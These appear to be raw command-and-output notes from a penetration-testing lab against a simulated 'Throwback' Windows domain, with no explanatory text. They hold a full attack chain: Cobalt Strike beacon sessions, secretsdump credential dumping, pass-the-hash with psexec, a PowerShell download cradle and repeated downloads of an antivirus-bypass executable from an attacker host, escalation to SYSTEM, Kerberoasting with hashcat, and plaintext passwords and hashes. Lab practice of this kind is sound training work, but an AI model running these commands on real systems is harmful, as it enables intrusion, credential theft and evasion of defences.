proxychains4 ssh JeffersD@10.200.34.117

beacon> shell type C:\Users\jeffersd\Documents\backup_notice.txt[*] Tasked beacon to run: type C:\Users\jeffersd\Documents\backup_notice.txt[+] host called home, sent: 81 bytes[+] received output:As we backup the servers all staff are to use the backup account for replicating the serversDon't use your domain admin accounts on the backup servers.
The credentials for the backup are:TBH_Backup2348!
Best Regards,Hans MercerThrowback Hacks Security System Administrator

✘ [email protected]  ~/Downloads  proxychains4 secretsdump.py -dc-ip 10.200.34.117 'THROWBACK/backup:TBH_Backup2348!'@10.200.34.117[proxychains] config file found: /usr/local/etc/proxychains.conf[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.16/lib/libproxychains4.dylib[proxychains] DLL init: proxychains-ng 4.16[proxychains] DLL init: proxychains-ng 4.16Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain  ...  10.50.31.71:5555  ...  10.200.34.117:445  ...  OK[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secrets[proxychains] Strict chain  ...  10.50.31.71:5555  ...  10.200.34.117:135  ...  OK[proxychains] Strict chain  ...  10.50.31.71:5555  ...  10.200.34.117:49667  ...  OKAdministrator:500:aad3b435b51404eeaad3b435b51404ee:4bedd990ee9b5b4ecc9ec1416f62401d:::CORPORATE$:aes128-cts-hmac-sha1-96:60d15b106d306965097caef803b02e68CORPORATE$:des-cbc-md5:2adce3b525310e52[*] Cleaning up...

Proxychains4 psexec.py -hashes "aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea" "THROWBACK.local/MercerH"@10.200.34.117

shell powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.50.31.71:8080/PowerView.ps1'); Get-NetUser | select samaccountname, description"

proxychains4 psexec.py "THROWBACK.local/MercerH:pikapikachu7"@10.200.34.118

powershell wget http://10.50.31.71:8080/BypassAV.exe -o C:\windows\temp\BypassAV.exe

load PortScan_ICMP: 10.200.34.243           02-F1-AD-C4-94-E1           
[+] received output:PCname: 10.200.34.243 CORP-ADT0110.200.34.243 139 Open -> Banner: Windows NetbiosIP Finished!End: 2022-06-25 08:19:2310.200.34.243 5985 Open -> Banner: Win Winrm10.200.34.243 445 Open -> Default is SMB 10.200.34.243 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.7

proxychains4 ssh DaviesJ@10.200.34.243powershell wget http://10.50.31.71:8080/BypassAV.exe -o C:\windows\temp\BypassAV.exe

beacon> getprivs[*] Tasked beacon to enable privileges[+] host called home, sent: 755 bytes[+] received output:SeDebugPrivilegeSeTcbPrivilegeSeCreateTokenPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeSecurityPrivilegeSeTakeOwnershipPrivilegeSeLoadDriverPrivilegeSeSystemProfilePrivilegeSeSystemtimePrivilegeSeProfileSingleProcessPrivilegeSeIncreaseBasePriorityPrivilegeSeCreatePagefilePrivilegeSeBackupPrivilegeSeRestorePrivilegeSeShutdownPrivilegeSeAuditPrivilegeSeSystemEnvironmentPrivilegeSeChangeNotifyPrivilegeSeRemoteShutdownPrivilegeSeUndockPrivilegeSeEnableDelegationPrivilegeSeManageVolumePrivilegebeacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 8 bytes[*] You are CORPORATE\DaviesJ (admin)
beacon> getsystem[*] Tasked beacon to get SYSTEM[+] host called home, sent: 2743 bytes[+] Impersonated NT AUTHORITY\SYSTEM
beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 8 bytes[*] You are NT AUTHORITY\SYSTEM (admin)

*] Tasked beacon to run: type C:\Users\dosierk\Documents\email_update.txt[+] host called home, sent: 79 bytes[+] received output:Hey team! Hope you guys are having a good day!
As all of you probably already now we are transferring to our new email service as wetransition please use the new emails provided to you as well as the default credentialsthat can be found within your emails.
Please do not use these emails outside of corporate as they contain sensitive information.
The new email format is based on what department you are in:
[email protected][email protected][email protected][email protected][email protected]
In order to access your email you will need to go to mail.corporate.local as we get our servers moved over.
If you do not already have mail.corporate.local set in your hosts file please reach out toIT to get that fixed.
Please remain patient as we make this transition and please feel free to email me with anyquestions you may have regarding the new transition: [email protected]
Karen Dosier,Human Relations Consulatant

echo "10.200.179.232 mail.corporate.local www.breachgtfo.local" | sudo tee -a /etc/hosts

Email: [email protected]Password: aqAwM53cW8AgRbfrUsername: JStewartData Breach: pwnDB

PCname: 10.200.34.79 TBSEC-DC0110.200.34.79 139 Open -> Banner: Windows Netbios10.200.34.79 445 Open -> Default is SMB 10.200.34.79 389 Open -> Default is LDAP IP Finished!End: 2022-06-25 11:07:4610.200.34.79 636 Open 10.200.34.79 88 Open -> Default is Kerberos 10.200.34.79 5985 Open -> Banner: Win Winrm
[+] received output:WebTitle: http://10.200.34.79:80 -> IIS Windows ServerWebBanner: http://10.200.34.79:80 -> Microsoft-IIS/10.010.200.34.79 80 Open -> Banner: HTTP/1.1 400 Bad Request Content-Length: 334 Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 25 Jun 2022 11:07:45 GMT Connection: close10.200.34.79 3389 Open -> Default is RDP 10.200.34.79 135 Open -> Default is WMI

hashcat -a 0 -m 13100 ~/Downloads/thmhash.txt ~/pentest/wordlists/rockyou.txt

$krb5tgs$23$*TBService$TBSECURITY.LOCAL$TBSECURITY.local/TBService*$9c3fe05f76596a5ef79a14cc067afc65$11c902eb82eda9d2445552fa5fda458d3ee87caaaa817e6dfea77089f60e80236cc6ef8e9590e0d43f0b131a039cb7f806fb57d44425702c473c7d62a0c55166ebdf9d3f9a88bd77a861aa5567771939bea93d2d4d1197b7c9c98c74aebaba5f85390570e85a606e88ca178ae93acce4274f0422758317fb966c0691ea4705c093ecf2335bd9198768b0cf2a8cecbea335da94e72139681e21e3fcb4988cafcc90744fea97b4467a8db59c687fa3c97654fff01715cbe69db4764c0b4018a227a0b6492afe13870a0d26ffc3dcedcd963f4219f9810f714ae096556f3a4dcf1a19535d177971ab617d9a77e7e633168d7b6749fcb20537260aabac8b1079f59d1ba3218b8f5a654641183ac6fbee81dc937bfd6e5dc640d2d349abc8dedd1099043dedeb11dd0cedb85f9edd8d2fa48d7d24a273d4cf4c30982e55041c3a5599cc7086b0d677dd07ae5722bf92201221053d26060de45e60025ff6b3e415ab49c347525a0c984f2c125e676843051fe2271773c3c305e11332e31a8a95ce01d0f215c82ab2ab5049d4dd7504ee6f77c0c096b815df4f513dc188b886faa1dbd47ebd1e103233fc19baf719c48c190a3f83bdc18879488ff2fa9166fdd0dfb357429d0b58fde6c9c211229847a62b4834391248553b96cfa251741318be5eea73947ef44824b9a1f89829fb793e065397e7c9c9e8712f50eb7c5358f10af130e98f4758327f8779b30da96c2091ebde2a3676430a520dd51228653e26dfe74695b3c203631b1a6e5a1c8fc01e0efcf4bcf8563891cb1396e2f109e18dd219ba6b09207c1dda6127fe6f92695d2c089820acc528f8a25cea1311773b1a03cd91a20b958da203444252d63df7651a20a693e2fa90fd73bc6f743dda2c1ed868590a1558a905f29008fe73fe34a115f4e2d3eddef59d54d84bc0b1298200e8063cf75beb99eb3c4aecfd76f26459409eb2992fd445c71711ba242706fde21cb640ef6f300a246147ac78d087289642d9204bb0ea7e9f8175a7d36b654e44b2ec6360c82c140362a90985d3549891e1b1287eb6db0fabef2d0e563b38112b0a3f2f5940c6e0b78bbd8b88e32d7dc049a43679c150c025d2606d29d0df3821d7d75e6b16069f5c97fda549bca0aa17fc792066729ad185b8e0548eb9844d3d66568eca24198be764eba30743437a1ddbebe02ea570436b723d2fd9a1fb8de485a7d646052f3086f1ffe7ce2e3ae6737c4647b61a422e6f2187aa43bd18be372d48c448c994ae018180c83a285499e8329e7fb3db443d32496a6994d40a5f17c4e6f7317aa4d01557d07c2cf76567454fe2aa118e7d72339c15f546fe6122d4ea2a026ff67ce558bfef59f4faf031af0a005c049e3677e5b96451862b603864:securityadmin284650

proxychains4 psexec.py TBSECURITY.local/TBService:[email protected]10.200.34.79powershell wget http://10.50.31.71:8080/BypassAV.exe -o C:\windows\temp\BypassAV.exe